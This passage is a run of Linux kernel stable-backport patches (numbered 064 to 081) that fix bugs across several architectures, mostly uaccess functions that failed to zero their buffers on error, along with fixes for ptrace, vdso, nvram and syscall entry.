+#define ROCIT_CONFIG_GEN0 0x1f403000 +#define ROCIT_CONFIG_GEN0_PCI_IOCU BIT(7) + extern void malta_be_init(void); extern int malta_be_handler(struct pt_regs *regs, int is_fixup); @@ -108,6 +111,8 @@ static void __init fd_activate(void) static int __init plat_enable_iocoherency(void) { int supported = 0; + u32 cfg; + if (mips_revision_sconid == MIPS_REVISION_SCON_BONITO) { if (BONITO_PCICACHECTRL & BONITO_PCICACHECTRL_CPUCOH_PRES) { BONITO_PCICACHECTRL |= BONITO_PCICACHECTRL_CPUCOH_EN; @@ -130,7 +135,8 @@ static int __init plat_enable_iocoherency(void) } else if (gcmp_niocu() != 0) { /* Nothing special needs to be done to enable coherency */ pr_info("CMP IOCU detected\n"); - if ((*(unsigned int *)0xbf403000 & 0x81) != 0x81) { + cfg = __raw_readl((u32 *)CKSEG1ADDR(ROCIT_CONFIG_GEN0)); + if (!(cfg & ROCIT_CONFIG_GEN0_PCI_IOCU)) { pr_crit("IOCU OPERATION DISABLED BY SWITCH - DEFAULTING TO SW IO COHERENCY\n"); return 0; } From 4787d839ac5e2ada45bdb81a36819b7cd80d2a9d Mon Sep 17 00:00:00 2001 From: Marcin Nowakowski Date: Wed, 12 Oct 2016 09:32:56 +0200 Subject: [PATCH 064/315] MIPS: ptrace: Fix regs_return_value for kernel context commit 74f1077b5b783e7bf4fa3007cefdc8dbd6c07518 upstream. Currently regs_return_value always negates reg[2] if it determines the syscall has failed, but when called in kernel context this check is invalid and may result in returning a wrong value. This fixes errors reported by CONFIG_KPROBES_SANITY_TEST Fixes: d7e7528bcd45 ("Audit: push audit success and retcode into arch ptrace.h") Signed-off-by: Marcin Nowakowski Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/14381/ Signed-off-by: Ralf Baechle Signed-off-by: Willy Tarreau --- arch/mips/include/asm/ptrace.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/include/asm/ptrace.h b/arch/mips/include/asm/ptrace.h index 5e6cd094739..a288de2199d 100644 --- a/arch/mips/include/asm/ptrace.h +++ b/arch/mips/include/asm/ptrace.h @@ -73,7 +73,7 @@ static inline int is_syscall_success(struct pt_regs *regs) static inline long regs_return_value(struct pt_regs *regs) { - if (is_syscall_success(regs)) + if (is_syscall_success(regs) || !user_mode(regs)) return regs->regs[2]; else return -regs->regs[2]; From b0a4c167399405897e0c11c354d77e4672d3b579 Mon Sep 17 00:00:00 2001 From: Paul Mackerras Date: Fri, 2 Sep 2016 21:47:59 +1000 Subject: [PATCH 065/315] powerpc/mm: Don't alias user region to other regions below PAGE_OFFSET commit f077aaf0754bcba0fffdbd925bc12f09cd1e38aa upstream. In commit c60ac5693c47 ("powerpc: Update kernel VSID range", 2013-03-13) we lost a check on the region number (the top four bits of the effective address) for addresses below PAGE_OFFSET. That commit replaced a check that the top 18 bits were all zero with a check that bits 46 - 59 were zero (performed for all addresses, not just user addresses). This means that userspace can access an address like 0x1000_0xxx_xxxx_xxxx and we will insert a valid SLB entry for it. The VSID used will be the same as if the top 4 bits were 0, but the page size will be some random value obtained by indexing beyond the end of the mm_ctx_high_slices_psize array in the paca. If that page size is the same as would be used for region 0, then userspace just has an alias of the region 0 space. If the page size is different, then no HPTE will be found for the access, and the process will get a SIGSEGV (since hash_page_mm() will refuse to create a HPTE for the bogus address). The access beyond the end of the mm_ctx_high_slices_psize can be at most 5.5MB past the array, and so will be in RAM somewhere. Since the access is a load performed in real mode, it won't fault or crash the kernel. At most this bug could perhaps leak a little bit of information about blocks of 32 bytes of memory located at offsets of i * 512kB past the paca->mm_ctx_high_slices_psize array, for 1 <= i <= 11. Fixes: c60ac5693c47 ("powerpc: Update kernel VSID range") Signed-off-by: Paul Mackerras Reviewed-by: Aneesh Kumar K.V Signed-off-by: Michael Ellerman Signed-off-by: Willy Tarreau --- arch/powerpc/mm/slb_low.S | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/arch/powerpc/mm/slb_low.S b/arch/powerpc/mm/slb_low.S index 17aa6dfceb3..e507f5e733f 100644 --- a/arch/powerpc/mm/slb_low.S +++ b/arch/powerpc/mm/slb_low.S @@ -110,7 +110,12 @@ BEGIN_FTR_SECTION END_MMU_FTR_SECTION_IFCLR(MMU_FTR_1T_SEGMENT) b slb_finish_load_1T -0: +0: /* + * For userspace addresses, make sure this is region 0. + */ + cmpdi r9, 0 + bne 8f + /* when using slices, we extract the psize off the slice bitmaps * and then we need to get the sllp encoding off the mmu_psize_defs * array. From 546731aaea6c5882bcb1adf4c109233bfbb22ae4 Mon Sep 17 00:00:00 2001 From: Anton Blanchard Date: Sun, 25 Sep 2016 17:16:53 +1000 Subject: [PATCH 066/315] powerpc/vdso64: Use double word compare on pointers commit 5045ea37377ce8cca6890d32b127ad6770e6dce5 upstream. __kernel_get_syscall_map() and __kernel_clock_getres() use cmpli to check if the passed in pointer is non zero. cmpli maps to a 32 bit compare on binutils, so we ignore the top 32 bits. A simple test case can be created by passing in a bogus pointer with the bottom 32 bits clear. Using a clk_id that is handled by the VDSO, then one that is handled by the kernel shows the problem: printf("%d\n", clock_getres(CLOCK_REALTIME, (void *)0x100000000)); printf("%d\n", clock_getres(CLOCK_BOOTTIME, (void *)0x100000000)); And we get: 0 -1 The bigger issue is if we pass a valid pointer with the bottom 32 bits clear, in this case we will return success but won't write any data to the pointer. I stumbled across this issue because the LLVM integrated assembler doesn't accept cmpli with 3 arguments. Fix this by converting them to cmpldi. Fixes: a7f290dad32e ("[PATCH] powerpc: Merge vdso's and add vdso support to 32 bits kernel") Signed-off-by: Anton Blanchard Signed-off-by: Michael Ellerman Signed-off-by: Willy Tarreau --- arch/powerpc/kernel/vdso64/datapage.S | 2 +- arch/powerpc/kernel/vdso64/gettimeofday.S | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/arch/powerpc/kernel/vdso64/datapage.S b/arch/powerpc/kernel/vdso64/datapage.S index 79796de1173..3263ee23170 100644 --- a/arch/powerpc/kernel/vdso64/datapage.S +++ b/arch/powerpc/kernel/vdso64/datapage.S @@ -57,7 +57,7 @@ V_FUNCTION_BEGIN(__kernel_get_syscall_map) bl V_LOCAL_FUNC(__get_datapage) mtlr r12 addi r3,r3,CFG_SYSCALL_MAP64 - cmpli cr0,r4,0 + cmpldi cr0,r4,0 crclr cr0*4+so beqlr li r0,__NR_syscalls diff --git a/arch/powerpc/kernel/vdso64/gettimeofday.S b/arch/powerpc/kernel/vdso64/gettimeofday.S index a76b4af37ef..38202132488 100644 --- a/arch/powerpc/kernel/vdso64/gettimeofday.S +++ b/arch/powerpc/kernel/vdso64/gettimeofday.S @@ -145,7 +145,7 @@ V_FUNCTION_BEGIN(__kernel_clock_getres) bne cr0,99f li r3,0 - cmpli cr0,r4,0 + cmpldi cr0,r4,0 crclr cr0*4+so beqlr lis r5,CLOCK_REALTIME_RES@h From 6d13a7b0e1dafbb3ff9f7778f4ea643fc0173a48 Mon Sep 17 00:00:00 2001 From: Gavin Shan Date: Tue, 2 Aug 2016 14:10:32 +1000 Subject: [PATCH 067/315] powerpc/powernv: Use CPU-endian PEST in pnv_pci_dump_p7ioc_diag_data() commit 5adaf8629b193f185ca5a1665b9e777a0579f518 upstream. This fixes the warnings reported from sparse: pci.c:312:33: warning: restricted __be64 degrades to integer pci.c:313:33: warning: restricted __be64 degrades to integer Fixes: cee72d5bb489 ("powerpc/powernv: Display diag data on p7ioc EEH errors") Signed-off-by: Gavin Shan Signed-off-by: Michael Ellerman Signed-off-by: Willy Tarreau --- arch/powerpc/platforms/powernv/pci.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/arch/powerpc/platforms/powernv/pci.c b/arch/powerpc/platforms/powernv/pci.c index 0473d31b3a4..d93c6cab18b 100644 --- a/arch/powerpc/platforms/powernv/pci.c +++ b/arch/powerpc/platforms/powernv/pci.c @@ -176,8 +176,8 @@ static void pnv_pci_dump_p7ioc_diag_data(struct pnv_phb *phb) pr_info(" dma1ErrorLog1 = 0x%016llx\n", data->dma1ErrorLog1); for (i = 0; i < OPAL_P7IOC_NUM_PEST_REGS; i++) { - if ((data->pestA[i] >> 63) == 0 && - (data->pestB[i] >> 63) == 0) + if ((be64_to_cpu(data->pestA[i]) >> 63) == 0 && + (be64_to_cpu(data->pestB[i]) >> 63) == 0) continue; pr_info(" PE[%3d] PESTA = 0x%016llx\n", i, data->pestA[i]); pr_info(" PESTB = 0x%016llx\n", data->pestB[i]); From 5daad2cce3080d132228900a1c8ecee81c3e33ce Mon Sep 17 00:00:00 2001 From: Paul Mackerras Date: Tue, 11 Oct 2016 22:25:47 +1100 Subject: [PATCH 068/315] powerpc/64: Fix incorrect return value from __copy_tofrom_user commit 1a34439e5a0b2235e43f96816dbb15ee1154f656 upstream. Debugging a data corruption issue with virtio-net/vhost-net led to the observation that __copy_tofrom_user was occasionally returning a value 16 larger than it should. Since the return value from __copy_tofrom_user is the number of bytes not copied, this means that __copy_tofrom_user can occasionally return a value larger than the number of bytes it was asked to copy. In turn this can cause higher-level copy functions such as copy_page_to_iter_iovec to corrupt memory by copying data into the wrong memory locations. It turns out that the failing case involves a fault on the store at label 79, and at that point the first unmodified byte of the destination is at R3 + 16. Consequently the exception handler for that store needs to add 16 to R3 before using it to work out how many bytes were not copied, but in this one case it was not adding the offset to R3. To fix it, this moves the label 179 to the point where we add 16 to R3. I have checked manually all the exception handlers for the loads and stores in this code and the rest of them are correct (it would be excellent to have an automated test of all the exception cases). This bug has been present since this code was initially committed in May 2002 to Linux version 2.5.20. Signed-off-by: Paul Mackerras Signed-off-by: Michael Ellerman Signed-off-by: Willy Tarreau --- arch/powerpc/lib/copyuser_64.S | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/powerpc/lib/copyuser_64.S b/arch/powerpc/lib/copyuser_64.S index d73a5901490..be94e1be4ae 100644 --- a/arch/powerpc/lib/copyuser_64.S +++ b/arch/powerpc/lib/copyuser_64.S @@ -336,6 +336,7 @@ END_FTR_SECTION_IFCLR(CPU_FTR_UNALIGNED_LD_STD) addi r3,r3,8 171: 177: +179: addi r3,r3,8 370: 372: @@ -350,7 +351,6 @@ END_FTR_SECTION_IFCLR(CPU_FTR_UNALIGNED_LD_STD) 173: 174: 175: -179: 181: 184: 186: From ac78e19eba6ae17502c33ff8f5e7a3bb69df8350 Mon Sep 17 00:00:00 2001 From: Pan Xinhui Date: Thu, 10 Dec 2015 15:30:02 +0800 Subject: [PATCH 069/315] powerpc/nvram: Fix an incorrect partition merge commit 11b7e154b132232535befe51c55db048069c8461 upstream. When we merge two contiguous partitions whose signatures are marked NVRAM_SIG_FREE, We need update prev's length and checksum, then write it to nvram, not cur's. So lets fix this mistake now. Also use memset instead of strncpy to set the partition's name. It's more readable if we want to fill up with duplicate chars . Fixes: fa2b4e54d41f ("powerpc/nvram: Improve partition removal") Signed-off-by: Pan Xinhui Signed-off-by: Michael Ellerman Signed-off-by: Willy Tarreau --- arch/powerpc/kernel/nvram_64.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/arch/powerpc/kernel/nvram_64.c b/arch/powerpc/kernel/nvram_64.c index 48fbc2b97e9..4047d8a035f 100644 --- a/arch/powerpc/kernel/nvram_64.c +++ b/arch/powerpc/kernel/nvram_64.c @@ -280,7 +280,7 @@ int __init nvram_remove_partition(const char *name, int sig, /* Make partition a free partition */ part->header.signature = NVRAM_SIG_FREE; - strncpy(part->header.name, "wwwwwwwwwwww", 12); + memset(part->header.name, 'w', 12); part->header.checksum = nvram_checksum(&part->header); rc = nvram_write_header(part); if (rc <= 0) { @@ -298,8 +298,8 @@ int __init nvram_remove_partition(const char *name, int sig, } if (prev) { prev->header.length += part->header.length; - prev->header.checksum = nvram_checksum(&part->header); - rc = nvram_write_header(part); + prev->header.checksum = nvram_checksum(&prev->header); + rc = nvram_write_header(prev); if (rc <= 0) { printk(KERN_ERR "nvram_remove_partition: nvram_write failed (%d)\n", rc); return rc; From 91be3ab41cd05f8200b3658288b13319bc43d589 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Fri, 9 Sep 2016 19:28:23 -0400 Subject: [PATCH 070/315] avr32: fix copy_from_user() commit 8630c32275bac2de6ffb8aea9d9b11663e7ad28e upstream. really ugly, but apparently avr32 compilers turns access_ok() into something so bad that they want it in assembler. Left that way, zeroing added in inline wrapper. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/avr32/include/asm/uaccess.h | 11 ++++++++++- arch/avr32/kernel/avr32_ksyms.c | 2 +- arch/avr32/lib/copy_user.S | 4 ++-- 3 files changed, 13 insertions(+), 4 deletions(-) diff --git a/arch/avr32/include/asm/uaccess.h b/arch/avr32/include/asm/uaccess.h index 245b2ee213c..a0a9b8c3104 100644 --- a/arch/avr32/include/asm/uaccess.h +++ b/arch/avr32/include/asm/uaccess.h @@ -74,7 +74,7 @@ extern __kernel_size_t __copy_user(void *to, const void *from, extern __kernel_size_t copy_to_user(void __user *to, const void *from, __kernel_size_t n); -extern __kernel_size_t copy_from_user(void *to, const void __user *from, +extern __kernel_size_t ___copy_from_user(void *to, const void __user *from, __kernel_size_t n); static inline __kernel_size_t __copy_to_user(void __user *to, const void *from, @@ -88,6 +88,15 @@ static inline __kernel_size_t __copy_from_user(void *to, { return __copy_user(to, (const void __force *)from, n); } +static inline __kernel_size_t copy_from_user(void *to, + const void __user *from, + __kernel_size_t n) +{ + size_t res = ___copy_from_user(to, from, n); + if (unlikely(res)) + memset(to + (n - res), 0, res); + return res; +} #define __copy_to_user_inatomic __copy_to_user #define __copy_from_user_inatomic __copy_from_user diff --git a/arch/avr32/kernel/avr32_ksyms.c b/arch/avr32/kernel/avr32_ksyms.c index d93ead02dae..7c6cf14f098 100644 --- a/arch/avr32/kernel/avr32_ksyms.c +++ b/arch/avr32/kernel/avr32_ksyms.c @@ -36,7 +36,7 @@ EXPORT_SYMBOL(copy_page); /* * Userspace access stuff. */ -EXPORT_SYMBOL(copy_from_user); +EXPORT_SYMBOL(___copy_from_user); EXPORT_SYMBOL(copy_to_user); EXPORT_SYMBOL(__copy_user); EXPORT_SYMBOL(strncpy_from_user); diff --git a/arch/avr32/lib/copy_user.S b/arch/avr32/lib/copy_user.S index ea59c04b07d..96a6de9d578 100644 --- a/arch/avr32/lib/copy_user.S +++ b/arch/avr32/lib/copy_user.S @@ -25,11 +25,11 @@ .align 1 .global copy_from_user .type copy_from_user, @function -copy_from_user: +___copy_from_user: branch_if_kernel r8, __copy_user ret_if_privileged r8, r11, r10, r10 rjmp __copy_user - .size copy_from_user, . - copy_from_user + .size ___copy_from_user, . - ___copy_from_user .global copy_to_user .type copy_to_user, @function From da189d04e7b33cdc1b8f98216bd1a7f011f56614 Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Sat, 17 Sep 2016 07:52:49 -0700 Subject: [PATCH 071/315] avr32: fix 'undefined reference to `___copy_from_user' commit 65c0044ca8d7c7bbccae37f0ff2972f0210e9f41 upstream. avr32 builds fail with: arch/avr32/kernel/built-in.o: In function `arch_ptrace': (.text+0x650): undefined reference to `___copy_from_user' arch/avr32/kernel/built-in.o:(___ksymtab+___copy_from_user+0x0): undefined reference to `___copy_from_user' kernel/built-in.o: In function `proc_doulongvec_ms_jiffies_minmax': (.text+0x5dd8): undefined reference to `___copy_from_user' kernel/built-in.o: In function `proc_dointvec_minmax_sysadmin': sysctl.c:(.text+0x6174): undefined reference to `___copy_from_user' kernel/built-in.o: In function `ptrace_has_cap': ptrace.c:(.text+0x69c0): undefined reference to `___copy_from_user' kernel/built-in.o:ptrace.c:(.text+0x6b90): more undefined references to `___copy_from_user' follow Fixes: 8630c32275ba ("avr32: fix copy_from_user()") Cc: Al Viro Acked-by: Havard Skinnemoen Acked-by: Hans-Christian Noren Egtvedt Signed-off-by: Guenter Roeck Signed-off-by: Willy Tarreau --- arch/avr32/lib/copy_user.S | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/arch/avr32/lib/copy_user.S b/arch/avr32/lib/copy_user.S index 96a6de9d578..075373471da 100644 --- a/arch/avr32/lib/copy_user.S +++ b/arch/avr32/lib/copy_user.S @@ -23,8 +23,8 @@ */ .text .align 1 - .global copy_from_user - .type copy_from_user, @function + .global ___copy_from_user + .type ___copy_from_user, @function ___copy_from_user: branch_if_kernel r8, __copy_user ret_if_privileged r8, r11, r10, r10 From cba31cb93827b2c119616470555eb852f860fb45 Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Wed, 13 Jul 2016 13:08:55 +0300 Subject: [PATCH 072/315] avr32: off by one in at32_init_pio() commit 55f1cf83d5cf885c75267269729805852039c834 upstream. The pio_dev[] array has MAX_NR_PIO_DEVICES elements so the > should be >=. Fixes: 5f97f7f9400d ('[PATCH] avr32 architecture') Signed-off-by: Dan Carpenter Signed-off-by: Willy Tarreau --- arch/avr32/mach-at32ap/pio.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/avr32/mach-at32ap/pio.c b/arch/avr32/mach-at32ap/pio.c index 903c7d81d0d..a8e208eaf2a 100644 --- a/arch/avr32/mach-at32ap/pio.c +++ b/arch/avr32/mach-at32ap/pio.c @@ -435,7 +435,7 @@ void __init at32_init_pio(struct platform_device *pdev) struct resource *regs; struct pio_device *pio; - if (pdev->id > MAX_NR_PIO_DEVICES) { + if (pdev->id >= MAX_NR_PIO_DEVICES) { dev_err(&pdev->dev, "only %d PIO devices supported\n", MAX_NR_PIO_DEVICES); return; From 2fe6f38f919939486edb08a4dcc83e41144af2ed Mon Sep 17 00:00:00 2001 From: Stefan Haberland Date: Mon, 8 Aug 2016 14:08:17 +0200 Subject: [PATCH 073/315] s390/dasd: fix hanging device after clear subchannel commit 9ba333dc55cbb9523553df973adb3024d223e905 upstream. When a device is in a status where CIO has killed all I/O by itself the interrupt for a clear request may not contain an irb to determine the clear function. Instead it contains an error pointer -EIO. This was ignored by the DASD int_handler leading to a hanging device waiting for a clear interrupt. Handle -EIO error pointer correctly for requests that are clear pending and treat the clear as successful. Signed-off-by: Stefan Haberland Reviewed-by: Sebastian Ott Signed-off-by: Martin Schwidefsky Signed-off-by: Willy Tarreau --- drivers/s390/block/dasd.c | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c index e91ec8cd9b0..aa9d384205c 100644 --- a/drivers/s390/block/dasd.c +++ b/drivers/s390/block/dasd.c @@ -1615,9 +1615,18 @@ void dasd_int_handler(struct ccw_device *cdev, unsigned long intparm, unsigned long long now; int expires; + cqr = (struct dasd_ccw_req *) intparm; if (IS_ERR(irb)) { switch (PTR_ERR(irb)) { case -EIO: + if (cqr && cqr->status == DASD_CQR_CLEAR_PENDING) { + device = (struct dasd_device *) cqr->startdev; + cqr->status = DASD_CQR_CLEARED; + dasd_device_clear_timer(device); + wake_up(&dasd_flush_wq); + dasd_schedule_device_bh(device); + return; + } break; case -ETIMEDOUT: DBF_EVENT_DEVID(DBF_WARNING, cdev, "%s: " @@ -1633,7 +1642,6 @@ void dasd_int_handler(struct ccw_device *cdev, unsigned long intparm, } now = get_tod_clock(); - cqr = (struct dasd_ccw_req *) intparm; /* check for conditions that should be handled immediately */ if (!cqr || !(scsw_dstat(&irb->scsw) == (DEV_STAT_CHN_END | DEV_STAT_DEV_END) && From 61f2d84aa4c053f7dde303c8066d7fdbbc8374e2 Mon Sep 17 00:00:00 2001 From: John David Anglin Date: Fri, 28 Oct 2016 23:00:34 -0400 Subject: [PATCH 074/315] parisc: Ensure consistent state when switching to kernel stack at syscall entry commit 6ed518328d0189e0fdf1bb7c73290d546143ea66 upstream. We have one critical section in the syscall entry path in which we switch from the userspace stack to kernel stack. In the event of an external interrupt, the interrupt code distinguishes between those two states by analyzing the value of sr7. If sr7 is zero, it uses the kernel stack. Therefore it's important, that the value of sr7 is in sync with the currently enabled stack. This patch now disables interrupts while executing the critical section. This prevents the interrupt handler to possibly see an inconsistent state which in the worst case can lead to crashes. Interestingly, in the syscall exit path interrupts were already disabled in the critical section which switches back to the userspace stack. Signed-off-by: John David Anglin Signed-off-by: Helge Deller Signed-off-by: Willy Tarreau --- arch/parisc/kernel/syscall.S | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/arch/parisc/kernel/syscall.S b/arch/parisc/kernel/syscall.S index e767ab733e3..69caa82c50d 100644 --- a/arch/parisc/kernel/syscall.S +++ b/arch/parisc/kernel/syscall.S @@ -106,8 +106,6 @@ linux_gateway_entry: mtsp %r0,%sr4 /* get kernel space into sr4 */ mtsp %r0,%sr5 /* get kernel space into sr5 */ mtsp %r0,%sr6 /* get kernel space into sr6 */ - mfsp %sr7,%r1 /* save user sr7 */ - mtsp %r1,%sr3 /* and store it in sr3 */ #ifdef CONFIG_64BIT /* for now we can *always* set the W bit on entry to the syscall @@ -133,6 +131,14 @@ linux_gateway_entry: depdi 0, 31, 32, %r21 1: #endif + + /* We use a rsm/ssm pair to prevent sr3 from being clobbered + * by external interrupts. + */ + mfsp %sr7,%r1 /* save user sr7 */ + rsm PSW_SM_I, %r0 /* disable interrupts */ + mtsp %r1,%sr3 /* and store it in sr3 */ + mfctl %cr30,%r1 xor %r1,%r30,%r30 /* ye olde xor trick */ xor %r1,%r30,%r1 @@ -147,6 +153,7 @@ linux_gateway_entry: */ mtsp %r0,%sr7 /* get kernel space into sr7 */ + ssm PSW_SM_I, %r0 /* enable interrupts */ STREGM %r1,FRAME_SIZE(%r30) /* save r1 (usp) here for now */ mfctl %cr30,%r1 /* get task ptr in %r1 */ LDREG TI_TASK(%r1),%r1 From 90f2278f097616dcef0c45d1b314c2c8ad20f021 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Fri, 9 Sep 2016 19:23:33 -0400 Subject: [PATCH 075/315] microblaze: fix __get_user() commit e98b9e37ae04562d52c96f46b3cf4c2e80222dc1 upstream. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/microblaze/include/asm/uaccess.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/microblaze/include/asm/uaccess.h b/arch/microblaze/include/asm/uaccess.h index 04e49553bdf..ef1c3400290 100644 --- a/arch/microblaze/include/asm/uaccess.h +++ b/arch/microblaze/include/asm/uaccess.h @@ -226,7 +226,7 @@ extern long __user_bad(void); #define __get_user(x, ptr) \ ({ \ - unsigned long __gu_val; \ + unsigned long __gu_val = 0; \ /*unsigned long __gu_ptr = (unsigned long)(ptr);*/ \ long __gu_err; \ switch (sizeof(*(ptr))) { \ From 22e232d64fc7865ee7f00b5d7fd68639c71777e7 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Fri, 9 Sep 2016 19:22:34 -0400 Subject: [PATCH 076/315] microblaze: fix copy_from_user() commit d0cf385160c12abd109746cad1f13e3b3e8b50b8 upstream. Signed-off-by: Al Viro [wt: s/might_fault/might_sleep] Signed-off-by: Willy Tarreau --- arch/microblaze/include/asm/uaccess.h | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/arch/microblaze/include/asm/uaccess.h b/arch/microblaze/include/asm/uaccess.h index ef1c3400290..5488a1a7166 100644 --- a/arch/microblaze/include/asm/uaccess.h +++ b/arch/microblaze/include/asm/uaccess.h @@ -371,10 +371,13 @@ extern long __user_bad(void); static inline long copy_from_user(void *to, const void __user *from, unsigned long n) { + unsigned long res = n; might_sleep(); - if (access_ok(VERIFY_READ, from, n)) - return __copy_from_user(to, from, n); - return n; + if (likely(access_ok(VERIFY_READ, from, n))) + res = __copy_from_user(to, from, n); + if (unlikely(res)) + memset(to + (n - res), 0, res); + return res; } #define __copy_to_user(to, from, n) \ From 7d84a5d51f1b04cbf0c4f752fad17da47d5c60a3 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sat, 20 Aug 2016 16:32:02 -0400 Subject: [PATCH 077/315] mn10300: failing __get_user() and get_user() should zero commit 43403eabf558d2800b429cd886e996fd555aa542 upstream. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/mn10300/include/asm/uaccess.h | 1 + 1 file changed, 1 insertion(+) diff --git a/arch/mn10300/include/asm/uaccess.h b/arch/mn10300/include/asm/uaccess.h index d7966e0f769..b9855e4f0cc 100644 --- a/arch/mn10300/include/asm/uaccess.h +++ b/arch/mn10300/include/asm/uaccess.h @@ -181,6 +181,7 @@ struct __large_struct { unsigned long buf[100]; }; "2:\n" \ " .section .fixup,\"ax\"\n" \ "3:\n\t" \ + " mov 0,%1\n" \ " mov %3,%0\n" \ " jmp 2b\n" \ " .previous\n" \ From 322dab0da0c4792e01391d7894078f4008ae0f02 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Fri, 9 Sep 2016 19:20:13 -0400 Subject: [PATCH 078/315] m32r: fix __get_user() commit c90a3bc5061d57e7931a9b7ad14784e1a0ed497d upstream. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/m32r/include/asm/uaccess.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/m32r/include/asm/uaccess.h b/arch/m32r/include/asm/uaccess.h index 1c7047bea20..a26d28d59ae 100644 --- a/arch/m32r/include/asm/uaccess.h +++ b/arch/m32r/include/asm/uaccess.h @@ -215,7 +215,7 @@ extern int fixup_exception(struct pt_regs *regs); #define __get_user_nocheck(x,ptr,size) \ ({ \ long __gu_err = 0; \ - unsigned long __gu_val; \ + unsigned long __gu_val = 0; \ might_sleep(); \ __get_user_size(__gu_val,(ptr),(size),__gu_err); \ (x) = (__typeof__(*(ptr)))__gu_val; \ From 643d0a2d2c3f77454a313c0e7999e1ce9a6363d2 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sun, 21 Aug 2016 23:33:47 -0400 Subject: [PATCH 079/315] sh64: failing __get_user() should zero commit c6852389228df9fb3067f94f3b651de2a7921b36 upstream. It could be done in exception-handling bits in __get_user_b() et.al., but the surgery involved would take more knowledge of sh64 details than I have or _want_ to have. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/sh/include/asm/uaccess_64.h | 1 + 1 file changed, 1 insertion(+) diff --git a/arch/sh/include/asm/uaccess_64.h b/arch/sh/include/asm/uaccess_64.h index 2e07e0f40c6..a2f9d053132 100644 --- a/arch/sh/include/asm/uaccess_64.h +++ b/arch/sh/include/asm/uaccess_64.h @@ -24,6 +24,7 @@ #define __get_user_size(x,ptr,size,retval) \ do { \ retval = 0; \ + x = 0; \ switch (size) { \ case 1: \ retval = __get_user_asm_b((void *)&x, \ From 60f0190e1114fad523eac306ea6d467fbf59c59d Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sun, 21 Aug 2016 22:13:39 -0400 Subject: [PATCH 080/315] score: fix __get_user/get_user commit c2f18fa4cbb3ad92e033a24efa27583978ce9600 upstream. * should zero on any failure * __get_user() should use __copy_from_user(), not copy_from_user() Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/score/include/asm/uaccess.h | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/arch/score/include/asm/uaccess.h b/arch/score/include/asm/uaccess.h index ab66ddde777..c882d961e5b 100644 --- a/arch/score/include/asm/uaccess.h +++ b/arch/score/include/asm/uaccess.h @@ -158,7 +158,7 @@ do { \ __get_user_asm(val, "lw", ptr); \ break; \ case 8: \ - if ((copy_from_user((void *)&val, ptr, 8)) == 0) \ + if (__copy_from_user((void *)&val, ptr, 8) == 0) \ __gu_err = 0; \ else \ __gu_err = -EFAULT; \ @@ -183,6 +183,8 @@ do { \ \ if (likely(access_ok(VERIFY_READ, __gu_ptr, size))) \ __get_user_common((x), size, __gu_ptr); \ + else \ + (x) = 0; \ \ __gu_err; \ }) @@ -196,6 +198,7 @@ do { \ "2:\n" \ ".section .fixup,\"ax\"\n" \ "3:li %0, %4\n" \ + "li %1, 0\n" \ "j 2b\n" \ ".previous\n" \ ".section __ex_table,\"a\"\n" \ From ed98892e36f323058ce203de3f4ea17b507e8b44 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sun, 21 Aug 2016 22:00:54 -0400 Subject: [PATCH 081/315] s390: get_user() should zero on failure commit fd2d2b191fe75825c4c7a6f12f3fef35aaed7dd7 upstream. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/s390/include/asm/uaccess.h | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/arch/s390/include/asm/uaccess.h b/arch/s390/include/asm/uaccess.h index 9c33ed4e666..b6017ace151 100644 --- a/arch/s390/include/asm/uaccess.h +++ b/arch/s390/include/asm/uaccess.h @@ -164,28 +164,28 @@ extern int __put_user_bad(void) __attribute__((noreturn)); __chk_user_ptr(ptr); \ switch (sizeof(*(ptr))) { \ case 1: { \ - unsigned char __x; \ + unsigned char __x = 0; \ __gu_err = __get_user_fn(sizeof (*(ptr)), \ ptr, &__x); \ (x) = *(__force __typeof__(*(ptr)) *) &__x; \ break; \ }; \ case 2: { \ - unsigned short __x; \ + unsigned short __x = 0; \ __gu_err = __get_user_fn(sizeof (*(ptr)), \ ptr, &__x); \ (x) = *(__force __typeof__(*(ptr)) *) &__x; \ break; \ }; \ case 4: { \ - unsigned int __x; \ + unsigned int __x = 0; \ __gu_err = __get_user_fn(sizeof (*(ptr)), \ ptr, &__x); \ (x) = *(__force __typeof__(*(ptr)) *) &__x; \ break; \ }; \ case 8: { \ - unsigned long long __x; \ + unsigned long long __x = 0; \ __gu_err = __get_user_fn(sizeof (*(ptr)), \ ptr, &__x); \ (x) = *(__force __typeof__(*(ptr)) *) &__x; \ From 